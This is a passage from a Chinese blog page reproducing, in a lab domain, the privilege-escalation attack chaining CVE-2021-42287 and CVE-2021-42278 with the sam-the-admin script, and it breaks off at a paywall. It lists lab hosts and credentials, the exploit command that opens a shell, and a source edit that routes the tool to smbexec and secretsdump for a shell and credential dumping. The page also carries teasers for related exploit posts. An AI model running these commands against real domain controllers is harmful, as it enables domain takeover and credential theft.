域控漏洞-CVE-2021-42287&42278复现

最新推荐文章于 2024-04-04 09:40:01 发布
最新推荐文章于 2024-04-04 09:40:01 发布
阅读量1.1w 收藏 10
点赞数 1
分类专栏: 信安文摘 文章标签: web安全 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FHLZLHQ/article/details/121964692
版权

文章目录

微信公众号:信安文摘

环境介绍

域:god.org

windows 7

192.168.52.143
机器名称:stu1
域内普通用户:liukaifeng01:hongrisec@2021@

windows server 2008(DC)

192.168.52.138
机器名称:owa
域管用户:administrator:rihongsec@2021

sam-the-admin python利用脚本

https://github.com/WazeHell/sam-the-admin

目前脚本只能在kali环境下运行,Windows下运行错误如下:

python3 sam_the_admin.py "god/liukaifeng01:hongrisec@2021@" -dc-ip 192.168.52.138 -shell

旧版kali无smbexec可执行文件:

查看源码实际就是调用两个可执行文件:

fbinary = "/usr/bin/impacket-smbexec"
    if options.dump:
        fbinary = "/usr/bin/impacket-secretsdump"
    getashell = f"KRB5CCNAME='{adminticket}' {fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}'                                                                    "
    os.system(getashell)

kali中存在这两个文件的py形式,/usr/local/bin/smbexec.py/usr/local/bin/secretsdump.py

修改源码为如下:

fbinary = "python3 /usr/local/bin/smbexec.py"
    if options.dump:
        fbinary = "python3 /usr/local/bin/secretsdump.py"
    getashell = f"KRB5CCNAME='{adminticket}' {fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}'                                                                    "
    os.sys
最低0.47元/天 解锁文章
君行路V
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-42287&CVE-2021-42278 域内提权
自强不息
11-18 202
​倘见玉皇先跪奏:他生永不落红尘
CVE-2021-42287(Windows域服务权限提升漏洞)
weixin_45682070的博客
12-16 2452
PAC PAC(Privilege Attribute Certificate),特权属性证书 需要提供User的SID和所在组Group的SID 只看上述的就简单解释并不能很清晰的了解,那么想要知道PAC这个概念,我们首先理一下kerberos的流程 网上很多kerberos如下: 1:用户向KDC发起AS_REQ,请求凭据是用户hash加密的时间戳,KDC使用用户hash进行解密,如果结果正确返回用krbtgt hash加密的TGT票据 2:用户凭借TGT票据向KDC发起针对特定服务的TGS_REQ
探秘ZeroLogon:Windows域控安全漏洞的克星
最新发布
gitblog_00088的博客
04-04 426
探秘ZeroLogon:Windows域控安全漏洞的克星 项目地址:https://gitcode.com/Rvn0xsy/ZeroLogon 零日攻击(Zero-Day)是网络安全领域的一种严重威胁,而ZeroLogon则是2020年发现的一个影响Windows域控制器的重大漏洞。本文将深入探讨ZeroLogon项目,这是一个开源工具,旨在帮助系统管理员检测并修复此漏洞。 项目简介 ZeroLo...
Windows域服务权限提升漏洞CVE-2021-42287, CVE-2021-42278
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows域服务权限提升漏洞CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
CVE-2021-42287CVE-2021-42278域内提权漏洞
good good study
05-09 2761
域内提权漏洞CVE-2021-42287CVE-2021-42278,只需一个普通域用户即可获取域控权限
微软最新漏洞CVE-2021-42287
weixin_43888456的博客
12-18 707
微软最新暴出的漏洞CVE-2021-42287/CVE-2021-42278 权限提升漏洞可将域内的任意用户提升至域管权限,已复现[em]e182[/em] 在 AD 域中请求ST票证时,首先需要提供 TGT票据。当 KDC 未找到请求的ST票证时,KDC 会自动再次搜索带有结尾的用户。漏洞原理:如果获得了DC用户的TGT票据且域内有一台名为DC结尾的用户。 漏洞原理:如果获得了 DC 用户的TGT票据且域内有一台名为DC结尾的用户。漏洞原理:如果获得了DC用户的TGT票据且域内有一台名为DC域控,再将DC
域内提权之CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1142
域内提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
网络攻防|CVE-2021-42287CVE-2021-42278域内提权
weixin_42282189的博客
12-20 2372
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 漏洞原理 Microsoft Windows Active Directory 域服务权限提升漏洞CVE-2021-42278CVE-2021-42287)攻击者可利用该漏洞将域内的普通用户权限提升到域管理员权限,造成风险和危害极大。 漏洞情报来源: 1、影响版本 CVE-2021-42278 ○ Windows Server 2012 R2 ○ Windows Server 2012 (S.
CVE-2021-42287/CVE-2021-42278利用
weixin_45945976的博客
12-20 686
CVE-2021-42287/CVE-2021-42278利用 地址:https://github.com/cube0x0/noPac
CVE-2021-42278 & CVE-2021-42287域内提权漏洞
good good study
02-17 2772
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充域控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证域内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒域控制器,使密钥分发中心KDC创建高权限票据。
内网渗透:六、CVE-2021-42287/CVE-2021-42278 域内提权
liu_jia_liang的博客
02-22 1352
0x01简介 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。0x02 影响0x02范围 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2...
CVE-2021-42287/CVE-2021-42278 Windows域提权漏洞分析】
mingyqf的博客
04-14 3101
转发至:安全客 https://www.anquanke.com/post/id/263910 CVE-2021-42287/CVE-2021-42278 Windows域提权漏洞分析 ​ 阅读量 76400 ​ 分享到:
内网渗透(七十九)之 CVE-2021-42287 权限提升漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-20 856
这个漏洞的产生核心的原因是KDC在处理UserName字段时的问题,而后结合两种攻击链针对域内和跨域进行攻击。当针对域内攻击时,结合了CVE-2021-42278漏洞来修改机器⽤户的saMAccountName属性,让KDC找不到⽤户,⾛进处理UserName的逻辑。然后再利⽤KDC在处理S4U2Self时的逻辑问题(不校验发起S4U2Self请求的⽤户是否具有权限发起S4U2Self请求)以及重新⽣成PAC的这⼀特性来进⾏攻击。当针对跨域攻击时,其实意义不⼤。
CVE-2021-42278域内权限提升
include_voidmain的博客
03-16 4901
0x01 漏洞背景 前些日子的靶场中涉及到了域内提权,当时刚好爆出CVE-2022-42278这个域内提权漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个域用户,就能获取域控权限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这里搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入域内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
SSL协议漏洞-CVE-2016-2183
07-27
回答: SSL协议漏洞CVE-2016-2183是一种信息泄露漏洞,可以通过修复方法来解决。修复方法主要是通过修改SSL密码套件算法来解决漏洞。具体的修复步骤如下:使用gpedit.msc进入组策略编辑器,依次打开计算机配置->管理模块->网络->SSL配置设置,打开密码套件顺序,选择“已启用”选项,在“SSL密码套件”下修改SSL密码套件算法,仅保留TLS 1.2 SHA256 和 SHA384 密码套件、TLS 1.2 ECC GCM 密码套件。\[3\]这样做可以有效修复SSL协议漏洞CVE-2016-2183。 #### 引用[.reference_title] - *1* *2* *3* [SSL/TLS协议信息泄露漏洞(CVE-2016-2183)、SSL/TLS RC4 信息泄露漏洞(CVE-2013-2566)修复方法](https://blog.csdn.net/kang0x0/article/details/114631551)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值